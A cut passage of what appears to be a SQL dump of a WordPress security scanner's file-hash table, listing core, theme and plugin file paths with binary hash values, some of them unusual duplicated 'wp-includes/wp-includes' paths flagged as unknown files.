�9�=)��1�ԃ�\nٝw#+','',0,'?'),('n�R��)l�}�E�5-','wp-content/themes/advance/inc/kirki/assets/scss/controls/multicheck.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.�g/W�5���+�r','��CSe��yC:ү|��۩J4�$�Ji�w!\0(c','',0,'?'),('n#�t=�\'����b]{�','wp-includes/js/tinymce/themes/modern/theme.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U���E��|�h(Zf�','ӣ }�ʫ�E�0�).TX��K�d~�H��NlK20','',0,'?'),('n-}��M4\nZm','wp-content/themes/weblog/acmethemes/customizer/footer-section/footer-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��%��\'Z�d�tڶ�','��).!tV&]7Yî�ϐ�Q�^W}�=�#j','',0,'?'),('n.�V\0�dZ���AX�','wp-content/themes/maxbusiness/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��^qmGМ� W���','!���5�F�3����c\\շ�+`�Q�ZY��','',0,'?'),('nAj+�u��VG7d','wp-content/plugins/wordfence/views/waf/status-tooltip-learning-mode.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�AT)T ��<˹o��','����}��\Z�dv�C��lC\\�{�{�4&[�','',0,'?'),('nSC!K����p���','wp-content/themes/promote/inc/customizer/sections.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jq��,��v������','���BQ%l���7C���{�Hk��g���\0','',0,'?'),('nSO=�\n9�ȗc��SA','wp-content/themes/sg-window/category.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�u�]y`��.{�#��','6��E�ȯX��j<~XS�d��/����','',0,'?'),('nU�N�Q6�H�k�','wp-content/plugins/wp-cerber/assets/flags/sx.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L,������Ֆ4�','=D�wN��+UaF�0�^.sG�����?���','',0,'?'),('nZ/1T:{&^�/n���','wp-admin/js/media-gallery.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��_8��5o�?�','Ƥ�$�30��I��X��C,b���\"0l�N�F','',0,'?'),('n[m��F�-','wp-includes/wp-includes/js/jquery/ui/button.js',0,'� ��.��ȴ�fh~O','� ��.��ȴ�fh~O','Û�.�k(5S�1��!����>�^I t�ȭ���.','',0,'?'),('n[�GO�J]@ԱuY','wp-includes/wp-includes/css/dist/list-reusable-blocks/style-rtl.css',0,'AU�L�Y����M��','AU�L�Y����M��','�)�RfZ�����~u3����}\'�?�!>','',0,'?'),('nv���\\�Jz}.yk�','wp-content/themes/promote/inc/kirki/assets/scss/controls/date.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*��������ܵ&�','�]�4��˩SB�4K������7�~�\\��j','',0,'?'),('n|J�� �Uϛ��l','wp-content/themes/Endolf/FT/plugin/options-framework/options-framework.php',0,'\"F�W�/��鱌7zl','\"F�W�/��鱌7zl','d���Q�:�g�l��Ntp�/1�D��>ā�','',0,'?'),('n��Cpp��%�M�','wp-includes/wp-includes/js/thickbox/loadingAnimation.gif',0,'�\"h\r�c���&�','�\"h\r�c���&�','B�F���`�F-��l�ڛ�RT6���Յ��','',0,'?'),('n����@��A��F�','wp-admin/network/sites.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��=�m�2\Z�.P���','�pA�V��O����i2E�ck�F]Y$SQ�Sl','',0,'?'),('n��)+��&=!��-E�','wp-content/themes/Endolf/js/jquery.flexslider.js',0,'j�(C���]sa�','j�(C���]sa�','S�Y�Xr����T= �:s��x��?0�b�����','',0,'?'),('n�-�U�Mo�f�.�&0�','wp-content/themes/advance/js/unminified/modernizr.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�P�BY%\0ѡ�� �','1U�2��zkI�EcjF��f:[�=�U�f�','',0,'?'),('n� T\r�K�E��lf�','wp-includes/wp-includes/customize/class-wp-customize-nav-menu-control.php',0,'�@V{R#8�7n�n\n�','�@V{R#8�7n�n\n�','��a�H����Muyw?�h:�B��<=��,##�','',0,'?'),('n����ғ}�D\\\n�','wp-includes/wp-includes/widgets/class-wp-widget-custom-html.php',0,'���dz\'E�n�N��','���dz\'E�n�N��','��l.��M|yc�)�Vr�]�Ak�:Ʃ\"�A','',0,'?'),('n���熰�ebWO�u','wp-content/plugins/wordfence/js/jquery.tmpl.min.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\}�\"���7ڷ��DZ','�.I�H\Z�g\0�H!7`��gޠZ�zȄ�ž6|','',0,'?'),('nŢ�)�c���q^\"','wp-includes/Requests/Exception/HTTP/503.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9�RaßC�`\0�UT�','�}��=3x�A9����l��p\0�ư�9e.O','',0,'?'),('nȵ��u:�b��fR�','wp-includes/wp-includes/js/jquery/ui/dialog.min.js',0,']2�z�L!E��,�C\Z',']2�z�L!E��,�C\Z','���|\r�Ce>�/k˪�\"E�0�݀V�L�','',0,'?'),('n�e�����;����<','wp-content/themes/twentytwentyone/assets/sass/style-editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9���Yp;:���N�','uL;�ީݒ<�sby\r7J�V����5[*ZzK��','',0,'?'),('n۹`��T�t�,��~','wp-content/themes/hueman/assets/front/js/jquery-plugins/jqueryaddDropCap.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4�6w�^��x��x� ','���jD瓘��ഇПs�wƟ�{��-/}B�m�','',0,'?'),('n�к���v�nj=ͮ','wp-admin/includes/class-bulk-plugin-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6/M�<ϋ��vk5','�s�q�<��$�wt���Ҫ�kԇ6�KL�','',0,'?'),('n��o�����y���','wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>�����_�\n\Zt','>��M�,��A���a���k��\0�m,�D��','',0,'?'),('n,�Q���3b��O','wp-includes/js/dist/warning.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��⚝q�y���TCg�','xl�:���-�z��AD-j]��2���;/`','',0,'?'),('n���0�9j�v8�\"','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_�s?8f,ؔa��','��ۂ5سq\'ԟ*�.F�Č�կ�ͻ�+\rSI�','',0,'?'),('n��ۗ��vXH)�','wp-includes/sodium_compat/src/Core32/Curve25519/README.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y��ϛ�vj��\n���','�S�x�^�V>m�!-�q���D�eV�����','',0,'?'),('oܛ���Ik?W�x','wp-includes/wp-includes/sitemaps/providers/class-wp-sitemaps-users.php',0,'܇��X%�EWy�m\'��','܇��X%�EWy�m\'��','�|�\rL�ʜэ�|�Ry��6S^�\\��','',0,'?'),('o\r�T��T��u(l','wp-content/themes/advance/layout/part-layout1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'xB��3h�ɇ� V1E:','�\"�+��^�)�yPŜJ�`|7�Ŷ�ڂ_','',0,'?'),('o+��R�D!��. Y','wp-includes/wp-includes/css/dist/editor/editor-styles.min.css',0,'�/Ow�:#��v���\r','�/Ow�:#��v���\r',']��Ɇ���m�{�w��#ߟ^��,n����,>','',0,'?'),('o�\0�Y� 57Ud��','wp-content/themes/spidermag/spidermag/hooks/woocommerce.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���P��a���\rծn','��i\n)�����~��[���<\Z�+�>$N��0�','',0,'?'),('oⳋ1�$I<xal','wp-content/themes/promote/inc/kirki/assets/js/controls/dashicons.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yrK�{�J��mf�Q��','畦��A\'!���K��rN�2����u�v.�d','',0,'?'),('o$������#��=�','wp-content/themes/newsmag/assets/vendors/owl-carousel/owl.carousel.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n#�Q���|J����','~�[��X�@x�@\'�̂2%�\Z0�q�� 9����','',0,'?'),('o\'RD-��\0���o��','wp-content/plugins/wordfence/images/support.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Cl�$��r����n<.','��$�M��Ԯ�&���(ᩘs��^ Ϣ*N��','',0,'?'),('o,}x�/��,��H�{V','wp-content/themes/newsmag/assets/sass/site/primary/_asides.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U=6�q�\0B�<��]','@֩$.�D��M�(t�B\'ن�&\0���K��','',0,'?'),('o1i�L5���z�$��7','wp-content/plugins/wordfence/modules/login-security/classes/model/compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�u1��\\�8���;#j-','P����|�l�_���Z��3z<NɧK���','',0,'?'),('oC�\"���Q���t��y','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/HChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��+�����%','�4!��H�:�6>�lE��Ec#���a{�A�{','',0,'?'),('oP�c����o�.�r','wp-includes/js/tinymce/skins/lightgray/img/object.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�rdP�E}u\n/M�A�� ','��#;!��I��.�>�uʍ�SV��m{|�e-','',0,'?'),('oS]�~(��7;�\r�','wp-includes/js/dist/shortcode.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ƾ8O{h�\\�X�f<D','M��\" ��uH��\"B�q*�4��_�\\��[[�!','',0,'?'),('oZ0�������<c�0','wp-includes/SimplePie/IRI.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n��9,�zӄycE�','Ye��k����\Zk�t~�n4�&�����p#�Ӝ','',0,'?'),('on�dX���%��l','wp-content/themes/event/wpml-config.xml',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}u���Y[�+I�','�\'^���5��9K\Z�|pA&O�4ʲ���6','',0,'?'),('oq8��s<`�ӵ)w�:','wp-includes/wp-includes/Text/Diff/Engine/shell.php',0,'��S�����?��z&','��S�����?��z&','�=5��:Pu\'pM�N[�9^�m>z@','',0,'?'),('os�� íҵ�^�','wp-content/themes/promote/inc/kirki/assets/js/postmessage.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��a��Se��e篃','���I�0���(\'{���I5o����0[\\x','',0,'?'),('o}�C܊8�E��G�','wp-content/plugins/wordfence/views/scanner/site-cleaning-high-sense.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rW�+�`Akæ�V r','U���mְ�E2�e�Io�#�z^aŁ���$G�','',0,'?'),('o��x��m�($��,=','wp-content/themes/newsmag/assets/sass/modules/_infinite-scroll.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������/8 �5\r�','��-�i�����QAK�Va�T(�\r�\\u~��U�','',0,'?'),('o�j̄��C-#|E�','wp-content/plugins/wp-cerber/assets/flags/ag.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I�g(4e���j52^G','��2�M�`O���?iX�e�B�q����x��','',0,'?'),('o�n�w����?�n�','wp-content/themes/pine/js/vendors.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��˒=`i��n���','��e]��.RWte5K��M41��:��y!.,','',0,'?'),('o��z`�7�u��K�$Q','wp-includes/wp-includes/error-protection.php',0,'?5�p��.9�;F�ܧ�','?5�p��.9�;F�ܧ�','֦ �7S�\Z�\\��cdLb|o�1��Y�ã��:','',0,'?'),('o�jĎNA�ħ�Q��E','wp-includes/wp-includes/js/customize-loader.min.js',0,'�-�����#�5&*�o�','�-�����#�5&*�o�','�<ş;\r#8�+=dK���F�S)8�׆>]�','',0,'?'),('o�oV�f��CϿK4{�','wp-content/themes/pine/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>-|��dPO&N� ','`�A�)!f�c����#� �yɇN�h�','',0,'?'),('o��M��j/Nj�a�*�','wp-content/themes/spidermag/assets/library/magnific-popup/css/magnific-popup.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0���vre����\n�`�','�X�;��Ɛ��9�@u�j�m�[��F�\"!�','',0,'?'),('o���峐-����Ťq','wp-content/themes/hueman/assets/front/img/demo/9-520x245.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8\"P}�D�V�X��J�','������λ/�t��dZM\n.`�a^rþ\\�\";M}','',0,'?'),('o��ijc�v!c�4�/r','wp-content/themes/anima/admin/images/image-style-4.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(�+�X|:��&�*�','���&�瀟S�Z�I�����4ï�M�~���','',0,'?'),('o�w*�\nΛGҜ�]','wp-content/plugins/wordfence/modules/login-security/img/header.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p����]�j-����','8�����#̄(8��O�\"� +h\"Fb��','',0,'?'),('o�%�+p\'idVQ�(>�','wp-includes/wp-includes/Requests/Exception/HTTP/415.php',0,'X��Tb�̮�JU�','X��Tb�̮�JU�','v%�_�\0�b$m�&`���(�=�m<�b\Zo0p','',0,'?'),('o��/�������%','wp-includes/wp-includes/js/dist/is-shallow-equal.js',0,'��� �\n�f@�!릶','��� �\n�f@�!릶','wNT(��`x܌�P�C��1Ow�b�]��ъ�','',0,'?'),('o���߆�0�y־��g','wp-content/themes/advance/css/advance_widgets_custom_css.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Wʔ�a,�l\\(���','.x��F�iC sVR�����ҶM-p�O��','',0,'?'),('o�x�jL<J����Ī?','wp-includes/wp-includes/js/tinymce/license.txt',0,'o�����x:�`����','o�����x:�`����','Y��#wO�g^\'�b��:�^� =跨|��','',0,'?'),('o㮚-�;?X:��pҡ','wp-trackback.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����ьWe=]!B��','��\'ߵ���3�M؞Ø��5���c�o�M�U�%','',0,'?'),('o���Y��څ��X�','wp-content/plugins/wordfence/images/flags.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W7� ��(�˿!�\Z7�','Bx�0%Ly�6���!��X\\z/<�n�6=\ZW�','',0,'?'),('o�[��n3u��ʹ�P5','wp-admin/options-general.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��O+�٢���%ڦS�','Y�*7:��!ȡ˦�Ak}���w��2��Z1','',0,'?'),('p��7u�L�_{2Û�','wp-includes/js/jquery/ui/draggable.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J���\\O��Љ/�Hp%','�N��B\0�!8\r���o? �)E�C>��','',0,'?'),('p�?وU���\0','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-cronjob-handler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C�}�$c�{G�(�P','��H�M�c�6�v�H�@�EmO2\'5�n�ҬX��','',0,'?'),('p{\r�� �%>/�Z��:','wp-content/plugins/wordfence/views/scanner/issue-base.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m|�&vfƲ~��','�i\"��m�$�PyM����d�� ���S�','',0,'?'),('p5HW�<CP\'����L ','wp-content/themes/kidzoo-lite/css/kidzoo.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����.�\"<�Sc��N','����|�\'�M���{Ò̖gL�\")���tf�','',0,'?'),('p:�,�`OlL�(�A','wp-content/plugins/wordfence/views/waf/waf-uninstall-success.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k�~�H���7�<�B��','\0!�F�E���KP��7�0��\n;6�}��$','',0,'?'),('pB���e�Gߴ^���R�','wp-content/plugins/wordfence/modules/login-security/css/jquery-ui.structure.min.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)/4;�$۔�ެvi\\','�n���i��뗅�N�vX�7�Y]�����D','',0,'?'),('pM�j�۰��sԐ?�','wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-dimension-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_�q�����4u��yd','^\'��\'D����I�8l.�F�~�����Jkȃ�Oe','',0,'?'),('pS>�w������1����','wp-content/themes/event/inc/front-page/program-schedule.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�˲?�x%� c$� ��y','�ڌ���q�&J���y�lr���!�B','',0,'?'),('pUy�a �b��va�;�8','wp-includes/js/comment-reply.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�F���D6����x�','!�x��G�����Go�Df�B8xXC�','',0,'?'),('p^HwW�+_b�6��H','wp-content/themes/anima/admin/images/image-style-2.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;^B_�1�^�ŜZ�Q','�Ub���l��R�Ci lS��(�O�/�?','',0,'?'),('peg�!�3�TGjq�q','wp-includes/wp-includes/js/dist/token-list.min.js',0,'��]L\'9jl7��[#�','��]L\'9jl7��[#�','�\"�Gc��iL���z5�DwN�#G��ZT{*s}�','',0,'?'),('pz~q��_�������','wp-content/themes/Yegor/FT/options/options.php',0,'��WI�[��j(�]�9�7','��WI�[��j(�]�9�7','��Y���ۋ��������@`^;&X','',0,'?'),('p��!�հ�?��ij��m','wp-content/themes/newsmag/assets/vendors/machothemes/machothemes.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\n�gK�_��Ḻ��','��+T�?M��!��n�R@��Vqd>S@CQ�2�','',0,'?'),('p��.а��[ÍD�','wp-includes/deprecated.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���X�;|N.��S_d�?','S5�g���*����r����x�{��&','',0,'?'),('p����x^Ӥ-��[��','wp-content/themes/newsmag/assets/sass/variables-site/_structure.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r`$��VBM�Uz�','}y:Q�q����[���fк}Zc�*��B;�','',0,'?'),('p��4L_�t+?M��t','wp-includes/wp-includes/class-wp-user-request.php',0,'w�?�v��\\����$','w�?�v��\\����$','z����.t(���C�o��� ���tV�','',0,'?'),('p��\\*e�\n\rψ��','wp-content/plugins/wordfence/modules/login-security/classes/controller/notices.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z�83�?w�����W','\r.l]\\) Z�q���p�]_^�u����J\n�%�','',0,'?'),('p��?�5�<�(F�]��','wp-content/themes/anima/admin/js/admin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Txe�]yŤFv�','y.�6�6-�O�9a��s��x��U����,','',0,'?'),('p�;�k�a?�����','wp-content/themes/capacious/section-parts/section-blog.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��=-����u����','���~�{�=t���z��L�0Vr��R�С','',0,'?'),('p̓0�2@��PF�tk','wp-content/plugins/wordfence/views/common/unsubscribe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y:h3�>��a ݑ�4~','E�q����Tg��O>F-��O�(�IƚZ��z','',0,'?'),('pϧZq���tP_�HR�','wp-content/themes/advance/inc/kirki/includes/scripts/class-kirki-scripts-tooltips.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':ۨ�+ӧ+��L�','ǕI{�+$�`o� �>�C�M�[\0B�\Z8y�','',0,'?'),('p�}G��J��$��x','wp-includes/block-supports/align.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v(\0����1�i�`','��=o�.�k�4�Ŋ*�P\\������[�','',0,'?'),('p���{�7��r�\\��!','wp-content/themes/maxbusiness/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x5(_�_;����8�','6�濫B�l��M�Ҹ���0��O���o��=�','',0,'?'),('p����b�~�oBk�Z','wp-content/plugins/akismet/class.akismet.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��~<��p���k�',' �;\0[���FsY\ZΧ��`�Qx����\"�m','',0,'?'),('p�?��~r��Fb�[��^','wp-content/themes/sg-window/inc/js/one-page-nav.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���*��?��;o','vR��S�/ve�`6��R�g.rp�g]�t����','',0,'?'),('p��u�w��S�ɴ0�','wp-content/plugins/hello.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E��t�5\0���P��w','f��s�� u�c����~���0b����I�&5)','',0,'?'),('qqC��$�����@','wp-content/plugins/wordfence/views/common/page-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u3�^1!��Gѩ}:�L','8^!c�$u��w�y��)�+ &�&���<�','',0,'?'),('qs��A�t���d�\\','wp-includes/js/dist/warning.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��@\r\nxt������','�w`\0��:�5��=����`�麯1R)T~�','',0,'?'),('q\"�co���>�2Rh�]','wp-admin/includes/plugin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�c��)��yf��t���','���!��������g|:ڧq�*օxɚI�t� ','',0,'?'),('q\'̓�|6��um����','wp-includes/wp-includes/https-migration.php',0,'�s9�4W#2��!H�߾�','�s9�4W#2��!H�߾�','2�|P��Ł�muН���~k��37rz0�x�A�','',0,'?'),('qJ|�Ц����K��aX','wp-includes/wp-includes/js/tinymce/plugins/hr/plugin.min.js',0,' %>�)���;��',' %>�)���;��','F��S�[k���&�f� 6+�b�>��','',0,'?'),('qL���I�Lc�','wp-includes/class-wp-recovery-mode-link-service.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����}f/c�nx5','�k�������ޙ(Z��t�M\0��;�t\r','',0,'?'),('qQr<P���|�����','wp-content/themes/sg-window/img/icons/small/yahoo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w��Bh�!�:��_','ߝ����})l�����Uy^D�:�ď�','',0,'?'),('q\\\"��z��#N��!','wp-content/themes/skt-pathway/inc/custom-functions.php',0,'�8������S�$','�8������S�$','�C��{*y5���S��IG+���L�a��','',0,'?'),('q]�j���&�4x��','wp-content/themes/advance/inc/kirki/assets/scss/controls/date.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m���\'e�/�R[��q�+','�]�4��˩SB�4K������7�~�\\��j','',0,'?'),('qgژ��57�3�J: ','wp-includes/wp-includes/css/dist/block-library/theme-rtl.css',0,'���Ԝ����p1l�','���Ԝ����p1l�','\ns�:���$�}K���%\rr�hM��Ap\r��','',0,'?'),('qh�3ג��\\�S��/','wp-content/themes/newsmag/inc/components/lazyload/class-newsmag-lazyload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9����|��J\\��TK\"','i>��9w�B�%�J���a��S��bx@�_���','',0,'?'),('qh�665�y|�=�?S ','wp-includes/js/jquery/jquery.serialize-object.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*�D�B\ru�6����!','��`�RԶ�2ɀ�`��Mx��i�G�fz�C2�','',0,'?'),('qt��^�9�0=t�z','wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-radio-image-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'�i=����V>���','\0Q�}����m�P��{���#�D�R���','',0,'?'),('q�!�S:�J\\�n�&C�x','wp-content/themes/event/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����Y��>3a|���','X�W#K�Y�z+���C�8�~3���W��','',0,'?'),('q��f���EH�7�d�','wp-includes/css/dist/editor/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z���Ey��,��~','��t>\'�\"A�ˊ�� �QN��\Z�gH��','',0,'?'),('q�^�YD�t;ELN��\n','wp-content/plugins/all-in-one-wp-security-and-firewall/logs/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0�� ��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('q�s���ƞ�ù��','wp-includes/rest-api/endpoints/class-wp-rest-post-types-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����!�Й�~L�C��','֓�2ǟ��lq�~�<%Z����g����','',0,'?'),('q��F~IfD�ө� xZf','wp-content/plugins/wordfence/css/diff.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','܀g �� �$���`r�Q','��$��hEJ^54<$�ӭYc����&','',0,'?'),('q����R+�q�\Z�2�','wp-includes/js/dist/edit-post.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')3~���F�<5yV�/','���.���Hs0�QU��JLe�h�\n�\n�','',0,'?'),('q�+������G6x�','wp-content/themes/promote/inc/kirki/assets/js/controls/toggle.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Љ�Р80�g�c%','����9�MXF��kB�?�u�L�!���b��@','',0,'?'),('q�0\\y*3�Q�>vJ�','wp-content/plugins/wp-cerber/assets/flags/tw.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ښ��� .�;���X','U��Ӥ�SQ���{�5�𐮆c-y��','',0,'?'),('q�0���������5','wp-includes/sodium_compat/src/Core32/SipHash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5O&?��E� ��%','^%%�hT��,�����k2�Ȯn=n%:��','',0,'?'),('q��5@�*=�&��\\X�','wp-content/plugins/wordfence/lib/wfHelperBin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';��!�ȍ��4Q��X#','��չ%-�^�q��U�q�M��eY���','',0,'?'),('q�ɹ��ԭD�L5;�c','wp-content/themes/promote/inc/kirki/includes/controls/class-kirki-controls-dimension-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;��3�F�0�QX#~','��U&\'���j+w�S���ja�v��ؗbo�','',0,'?'),('q��^2���Al��','wp-content/themes/sg-window/inc/js/sidebar.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`h�U��z��csZ�','fC9��H\'6vz�)�voiף����;�U�|r�','',0,'?'),('q�$\'6�e��-W]','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/PHP52/SplFixedArray.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nb�x ��BC��?���\Z','��e��C8�&\r����h\r��2w�(^Й�V\0','',0,'?'),('q�0�\Z�\r�\"e\0.E�','wp-content/themes/fastblog/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@�D)w�U�`,y=�0�','��u܀IE~�Q��e��\';����4�','',0,'?'),('q�}zpZ�{}���\rM��','wp-content/themes/auberge/assets/js/vendor/imagesloaded.pkgd.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����Q�����,#','ˏ�y��Zt���:?<`����f��eS�8���','',0,'?'),('q�.�ײ��6W�x','wp-content/themes/Endolf/FT/plugin/options-framework/includes/class-options-framework.php',0,'n .��OTJ%~9M��O','n .��OTJ%~9M��O','�%挌C�[����;n~�/HǷ�p�!/�l�jo','',0,'?'),('qީ��X�� ��h}�','wp-content/themes/spidermag/spidermag/customwidget/spidermag-widget.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m�︈��y�#�ԯ.','!��6��(Έ�B�`n�hs����','',0,'?'),('q�_\ni�q\\�|�!�','wp-content/themes/newsmag/changelog.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s�b8���x�����','j�Y��D����D� ċs����D�w� �L$c�','',0,'?'),('q�}Sg�N]���n��','wp-content/themes/travel-stories/font/Lora-Regular/lora-regular.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��gOq�����2�','��W����O7gCV�:�=�#�^:/u,�.Sm�g','',0,'?'),('r[��s2<�����u','wp-content/themes/twentytwentyone/assets/sass/06-components/posts-and-pages.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g<Q�P�;�z��[Ѩɹ','����j�Qo���<>�\n��Y�����g1�b','',0,'?'),('r��h��v��Lk/��','wp-admin/network/upgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�q#��ԑ��\Z;f��','��3PJݎ��Y��b�GqA��8o:?��>�','',0,'?'),('r+zk;� 4��WI','wp-includes/js/tinymce/themes/modern/theme.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�(3�o�U�2ŝU�2�','�2.�pt�\"r�`)��\r.C�l�\\\Z��BIX','',0,'?'),('r:��U�j�3N��6��','wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-revisions-controller.php',0,'���DBSq&a��_�%','���DBSq&a��_�%','�2��C���Zh+�̴���\'�H��p�H�r','',0,'?'),('rI\0yg�E!���2\0C','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/503-lockout.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�P����mx�f�4 